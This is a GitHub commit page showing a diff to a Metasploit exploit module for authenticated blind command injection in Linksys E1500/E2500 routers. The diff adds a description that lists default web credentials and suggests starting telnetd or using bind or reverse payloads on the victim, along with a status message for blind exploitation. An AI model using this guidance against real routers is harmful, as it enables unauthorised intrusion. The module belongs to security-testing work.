Skip to content

Commit cd8bc2f

Browse files
author
m-1-k-3
committed
description, blind exploitation info on cmd payload
1 parent b0a61ad commit cd8bc2f

File tree

1 file changed

+10
-2
lines changed

1 file changed

+10
-2
lines changed

modules/exploits/linux/http/linksys_e1500_up_exec.rb

Lines changed: 10 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -17,9 +17,15 @@ class Metasploit3 < Msf::Exploit::Remote
1717

1818
def initialize(info = {})
1919
super(update_info(info,
20-
'Name' => 'Linksys E1500 Command Execution - Upload and Execute',
20+
'Name' => 'Linksys E1500/E2500 Command Execution - Upload and Execute',
2121
'Description' => %q{
22-
This module can be used to execute a payload on Linksys Routers
22+
Some Linksys Routers are vulnerable to an authenticated OS command
23+
injection. Default credentials for the web interface are admin/admin
24+
or admin/password. Since it is a blind os command injection
25+
vulnerability, there is no output for the executed command with the generic
26+
payload. A ping command against a controlled system could be used for testing
27+
purposes. You could also start the telnetd on the victim or just use the
28+
bind or reverse payloads.
2329
},
2430
'Author' => [ 'Michael Messner <[email protected]>', #Metasploit module
2531
'juan vazquez' # minor help
@@ -139,6 +145,8 @@ def exploit
139145
res = request(cmd,user,pass,uri)
140146
if (!res)
141147
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
148+
else
149+
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
142150
end
143151
return
144152
end

0 commit comments

Comments
 (0)